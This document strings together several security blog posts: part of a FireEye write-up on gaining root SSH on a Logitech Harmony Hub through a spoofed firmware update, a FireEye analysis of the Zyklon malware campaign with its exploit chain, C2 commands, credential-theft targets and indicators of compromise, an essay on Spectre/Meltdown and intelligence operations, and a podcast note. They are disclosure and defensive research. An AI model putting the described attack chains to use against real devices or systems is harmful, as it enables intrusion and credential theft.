If the sysBuild parameter in the POST request body does not match the current version known by the server, the server responds with an initial response containing information about the new package version. For an undetermined reason, the Harmony Hub ignores this initial response and sends a second request. The second response contains multiple URLs pointing to the updated package, as shown in Figure 12.


Figure 12: The JSON response containing URLs for the software update

We downloaded and inspected the .pkg files listed in the response object, which are actually just ZIP archives. The archives contain a simple file hierarchy, as shown in Figure 13.


Figure 13: The .pkg archive file hierarchy

The manifest.json file contains information used to instruct the Harmony Hub’s update process on how to handle the archive’s contents (Figure 14).


Figure 14: The contents of the manifest.json file

The Harmony Hub’s update process executes the script provided by the installer parameter of the manifest if it is present within the archive. We modified this script, as shown in Figure 15, to create the /etc/tdeenable file, which causes the boot process to enable the SSH interface as previously described.


Figure 15: The modified update.sh file

We created a new malicious archive with the appropriate .pkg extension, which was hosted on a local web server. The next time the Harmony Hub checked for updates against the URL supplied in the modified GetJson2URIs response, we sent a modified response to point to this update. The Harmony Hub retrieved our malicious update package, and after rebooting the Harmony Hub, the SSH interface was enabled. This allowed us to access the device with the username root and a blank password, as shown in Figure 16.


Figure 16: The SSH interface was enabled after a reboot

Conclusion

As technology becomes further embedded into our daily lives, the trust we place in various devices unknowingly increases exponentially. Due to the fact that the Harmony Hub, like many IoT devcies, uses a common processor architecture, malicious tools could easily be added to a compromised Harmony Hub, increasing the overall impact of a targeted attack. However, Logitech worked with our team to quickly address the vulnerabilities with their current firmware, 4.15.96. Developers of the devices we place our trust should be vigilant when removing potential attack vectors that could expose end users to security risks. We also want to share Logitech’s statement on the research and work by the Red Team:

"At Logitech, we take our customers’ security and privacy very seriously. In late January 2018, security research firm FireEye pointed out vulnerabilities that could impact Logitech Harmony Hub-based products*.

If a malicious hacker had already gained access to a Hub-users network, these vulnerabilities could be exploited. We appreciate the work that professional security research firms like FireEye provide when identifying these types of vulnerabilities on IoT devices.

As soon as FireEye shared their research findings with us, we reviewed internally and immediately started to develop firmware to address it. As of April 10, we have released firmware that addresses all of the vulnerabilities that were identified. For any customers who haven’t yet updated to firmware version 4.15.96, we recommend you check the MyHarmony software and sync your Hub-based remote and receive it. Complete directions on updating your firmware can be found here.

*Hub-based products include: Harmony Elite, Harmony Home Hub, Harmony Ultimate Hub, harmony Hub, Harmony Home Control, Harmony Pro, Harmony Smart Control, Harmony Companion, Harmony Smart Keyboard, Harmony Ultimate and Ultimate Home."

Microsoft Office Vulnerabilities Used to Distribute Zyklon Malware in Recent Campaign

Introduction

FireEye researchers recently observed threat actors leveraging relatively new vulnerabilities in Microsoft Office to spread Zyklon HTTP malware. Zyklon has been observed in the wild since early 2016 and provides myriad sophisticated capabilities.

Zyklon is a publicly available, full-featured backdoor capable of keylogging, password harvesting, downloading and executing additional plugins, conducting distributed denial-of-service (DDoS) attacks, and self-updating and self-removal. The malware may communicate with its command and control (C2) server over The Onion Router (Tor) network if configured to do so. The malware can download several plugins, some of which include features such as cryptocurrency mining and password recovery, from browsers and email software. Zyklon also provides a very efficient mechanism to monitor the spread and impact.

Infection Vector

We have observed this recent wave of Zyklon malware being delivered primarily through spam emails. The email typically arrives with an attached ZIP file containing a malicious DOC file (Figure 1 shows a sample lure).

The following industries have been the primary targets in this campaign:

  • Telecommunications
  • Insurance
  • Financial Services


Figure 1: Sample lure documents

Attack Flow

  1. Spam email arrives in the victim’s mailbox as a ZIP attachment, which contains a malicious DOC file.
  2. The document files exploit at least three known vulnerabilities in Microsoft Office, which we discuss in the Infection Techniques section. Upon execution in a vulnerable environment, the PowerShell based payload takes over.
  3. The PowerShell script is responsible for downloading the final payload from C2 server to execute it.

A visual representation of the attack flow and execution chain can be seen in Figure 2.


Figure 2: Zyklon attack flow

Infection Techniques

CVE-2017-8759

This vulnerability was discovered by FireEye in September 2017, and it is a vulnerability we have observed being exploited in the wild.

The DOC file contains an embedded OLE Object that, upon execution, triggers the download of an additional DOC file from the stored URL (seen in Figure 3).


Figure 3: Embedded URL in OLE object

CVE-2017-11882

Similarly, we have also observed actors leveraging another recently discovered vulnerability (CVE-2017-11882) in Microsoft Office. Upon opening the malicious DOC attachment, an additional download is triggered from a stored URL within an embedded OLE Object (seen in Figure 4).


Figure 4: Embedded URL in OLE object


Figure 5: HTTP GET request to download the next level payload

The downloaded file, doc.doc, is XML-based and contains a PowerShell command (shown in Figure 6) that subsequently downloads the binary Pause.ps1.


Figure 6: PowerShell command to download the Pause.ps1 payload

Dynamic Data Exchange (DDE)

Dynamic Data Exchange (DDE) is the interprocess communication mechanism that is exploited to perform remote code execution. With the help of a PowerShell script (shown in Figure 7), the next payload (Pause.ps1) is downloaded.


Figure 7: DDE technique used to download the Pause.ps1 payload

One of the unique approaches we have observed is the use of dot-less IP addresses (example: hxxp://258476380).

Figure 8 shows the network communication of the Pause.ps1 download.


Figure 8: Network communication to download the Pause.ps1 payload

Zyklon Delivery

In all these techniques, the same domain is used to download the next level payload (Pause.ps1), which is another PowerShell script that is Base64 encoded (as seen in Figure 8).

The Pause.ps1 script is responsible for resolving the APIs required for code injection. It also contains the injectable shellcode. The APIs contain VirtualAlloc(), memset(), and CreateThread(). Figure 9 shows the decoded Base64 code.


Figure 9: Base64 decoded Pause.ps1

The injected code is responsible for downloading the final payload from the server (see Figure 10). The final stage payload is a PE executable compiled with .Net framework.


Figure 10: Network traffic to download final payload (words.exe)

Once executed, the file performs the following activities:

  1. Drops a copy of itself in %AppData%\svchost.exe\svchost.exe and drops an XML file, which contains configuration information for Task Scheduler (as shown in Figure 11).
  2. Unpacks the code in memory via process hollowing. The MSIL file contains the packed core payload in its .Net resource section.
  3. The unpacked code is Zyklon.


Figure 11: XML configuration file to schedule the task

The Zyklon malware first retrieves the external IP address of the infected machine using the following:

  • api.ipify[.]org
  • ip.anysrc[.]net
  • myexternalip[.]com
  • whatsmyip[.]com

The Zyklon executable contains another encrypted file in its .Net resource section named tor. This file is decrypted and injected into an instance of InstallUtiil.exe, and functions as a Tor anonymizer.

Command & Control Communication

The C2 communication of Zyklon is proxied through the Tor network. The malware sends a POST request to the C2 server. The C2 server is appended by the gate.php, which is stored in file memory. The parameter passed to this request is getkey=y. In response to this request, the C2 server responds with a Base64-encoded RSA public key (seen in Figure 12).


Figure 12: Zyklon public RSA key

After the connection is established with the C2 server, the malware can communicate with its control server using the commands shown in Table 1.

Command

Action

sign

Requests system information

settings

Requests settings from C2 server

logs

Uploads harvested passwords

wallet

Uploads harvested cryptocurrency wallet data

proxy

Indicates SOCKS proxy port opened

miner

Cryptocurrency miner commands

error

Reports errors to C2 server

ddos

DDoS attack commands

Table 1: Zyklon accepted commands

The following figures show the initial request and subsequent server response for the “settings” (Figure 13), “sign” (Figure 14), and “ddos” (Figure 15) commands.


Figure 13: Zyklon issuing “settings” command and subsequent server response


Figure 14: Zyklon issuing “sign” command and subsequent server response


Figure 15: Zyklon issuing “ddos” command and subsequent server response

Plugin Manager

Zyklon downloads number of plugins from its C2 server. The plugin URL is stored in file in following format:

  • /plugin/index.php?plugin=<Plugin_Name>

The following plugins are found in the memory of the Zyklon malware:

  • /plugin/index.php?plugin=cuda
  • /plugin/index.php?plugin=minerd
  • /plugin/index.php?plugin=sgminer
  • /plugin/index.php?plugin=socks
  • /plugin/index.php?plugin=tor
  • /plugin/index.php?plugin=games
  • /plugin/index.php?plugin=software
  • /plugin/index.php?plugin=ftp
  • /plugin/index.php?plugin=email
  • /plugin/index.php?plugin=browser

The downloaded plugins are injected into: Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe.

Additional Features

The Zyklon malware offers the following additional capabilities (via plugins):

Browser Password Recovery

Zyklon HTTP can recover passwords from popular web browsers, including:

  • Google Chrome
  • Mozilla Firefox
  • Internet Explorer
  • Opera Browser
  • Chrome Canary/SXS
  • CoolNovo Browser
  • Apple Safari
  • Flock Browser
  • SeaMonkey Browser
  • SRWare Iron Browser
  • Comodo Dragon Browser
FTP Password Recovery

Zyklon currently supports FTP password recovery from the following FTP applications:

  • FileZilla
  • SmartFTP
  • FlashFXP
  • FTPCommander
  • Dreamweaver
  • WS_FTP
Gaming Software Key Recovery

Zyklon can recover PC Gaming software keys from the following games:

  • Battlefield
  • Call of Duty
  • FIFA
  • NFS
  • Age of Empires
  • Quake
  • The Sims
  • Half-Life
  • IGI
  • Star Wars
Email Password Recovery

Zyklon may also collect email passwords from following applications:

  • Microsoft Outlook Express
  • Microsoft Outlook 2002/XP/2003/2007/2010/2013
  • Mozilla Thunderbird
  • Windows Live Mail 2012
  • IncrediMail, Foxmail v6.x - v7.x
  • Windows Live Messenger
  • MSN Messenger
  • Google Talk
  • GMail Notifier
  • PaltalkScene IM
  • Pidgin (Formerly Gaim) Messenger
  • Miranda Messenger
  • Windows Credential Manager
License Key Recovery

The malware automatically detects and decrypts the license/serial keys of more than 200 popular pieces of software, including Office, SQL Server, Adobe, and Nero.

Socks5 Proxy

Zyklon features the ability to establish a reverse Socks5 proxy server on infected host machines.

Hijack Clipboard Bitcoin Address

Zyklon has the ability to hijack the clipboard, and replaces the user’s copied bitcoin address with an address served up by the actor’s control server.

Zyklon Pricing

Researchers identified different versions of Zyklon HTTP being advertised in a popular underground marketplace for the following prices:

  • Normal build: $75 (USD)
  • Tor-enabled build: $125 (USD)
  • Rebuild/Updates: $15 (USD)
  • Payment Method: Bitcoin (BTC)

Conclusion

Threat actors incorporating recently discovered vulnerabilities in popular software – Microsoft Office, in this case – only increases the potential for successful infections. These types of threats show why it is very important to ensure that all software is fully updated. Additionally, all industries should be on alert, as it is highly likely that the threat actors will eventually move outside the scope of their current targeting.

At this time of writing, FireEye Multi Vector Execution (MVX) engine is able to recognize and block this threat. Table 2 lists the current detection and blocking capabilities by product.

Detection Name

Product

Action

POWERSHELL DOWNLOADER D (METHODOLOGY)

HX

Detect

SUSPICIOUS POWERSHELL USAGE (METHODOLOGY)

HX

Detect

POWERSHELL DOWNLOADER (METHODOLOGY)

HX

Detect

SUSPICIOUS EQNEDT USAGE (METHODOLOGY)

HX

Detect

TOR (TUNNELER)

HX

Detect

SUSPICIOUS SVCHOST.EXE (METHODOLOGY)

HX

Detect

Malware.Binary.rtf

EX/ETP/NX

Block

Malware.Binary

EX/ETP/NX

Block

FE_Exploit_RTF_CVE_2017_8759

EX/ETP/NX

Block

FE_Exploit_RTF_CVE201711882_1

EX/ETP/NX

Block

Table 2: Current detection capabilities by FireEye products

Indicators of Compromise

The contained analysis is based on the representative sample lures shown in Table 3.

MD5

Name

76011037410d031aa41e5d381909f9ce

accounts.doc

4bae7fb819761a7ac8326baf8d8eb6ab

Courrier.doc

eb5fa454ab42c8aec443ba8b8c97339b

doc.doc

886a4da306e019aa0ad3a03524b02a1c

Pause.ps1

04077ecbdc412d6d87fc21e4b3a4d088

words.exe

Table 3: Sample Zyklon lures

Network Indicators
  • 154.16.93.182
  • 85.214.136.179
  • 178.254.21.218
  • 159.203.42.107
  • 217.12.223.216
  • 138.201.143.186
  • 216.244.85.211
  • 51.15.78.0
  • 213.251.226.175
  • 93.95.100.202
  • warnono.punkdns.top

Spectre and Meltdown from a CNO Perspective

Longtime readers know that I have no problem with foreign countries replacing American vendors with local alternatives. For example, see Five Reasons I Want China Running Its Own Software. This is not a universal principle, but as an American I am fine with it. Putting my computer network operations (CNO) hat on, I want to share a few thoughts about the intersection of the anti-American vendor mindset with the recent Spectre and Meltdown attacks.

There are probably non-Americans, who, for a variety of reasons, feel that it would be "safer" for them to run their cloud computing workloads on non-American infrastructure. Perhaps they feel that it puts their data beyond the reach of the American Department of Justice. (I personally feel that it's an over-reach by DoJ to try to access data beyond American borders, eg Microsoft Corp. v. United States.)

The American intelligence community and computer network operators, however, might prefer to have that data outside American borders. These agencies are still bound by American laws, but those laws generally permit exploitation overseas.

Now put this situation in the context of Spectre and Meltdown. Begin with the attack scenario mentioned by Nicole Perlroth, where an attacker rents a few minutes of time on various cloud systems, then leverages Spectre and/or Meltdown to try to gather sensitive data from other virtual machines on the same physical hardware.

No lawyer or judge would allow this sort of attack scenario if it were performed in American systems. It would be very difficult, I think, to minimize data in this kind of "fishing expedition." Most of the data returned would belong to US persons and would be subject to protection. Sure, there are conspiracy theorists out there who will never trust that the US government follows its own laws. These people are sure that the USG already knew about Spectre and Meltdown and ravaged every American cloud system already, after doing the same with the "Intel Management Engine backdoors."

In reality, US law will prevent computer network operators from running these sorts of missions on US cloud infrastructure. Overseas, it's a different story. Non US-persons do not enjoy the same sorts of privacy protections as US persons. Therefore, the more "domestic" (non-American) the foreign target, the better. For example, if the IC identified a purely Russian cloud provider, it would not be difficult for the USG to authorize a Spectre-Meltdown collection operation against that target.

I have no idea if this is happening, but this was one of my first thoughts when I first heard about this new attack vector.

Bonus: it's popular to criticize academics who research cybersecurity. They don't seem to find much that is interesting or relevant. However, academics played a big role in discovering Spectre and Meltdown. Wow!

Analyzing the Malware Analysts – Inside FireEye’s FLARE Team

At the Black Hat USA 2016 conference in Las Vegas last week, I was fortunate to sit down with Michael Sikorski, Director, FireEye Labs Advanced Reverse Engineering (FLARE) Team.

During our conversation we discussed the origin of the FLARE team, what it takes to analyze malware, Michael’s book “Practical Malware Analysis: The Hands-On Guide to Dissecting Malicious Software,” and the latest open source freeware tools FLOSS and FakeNet-NG.

Listen to the full podcast here.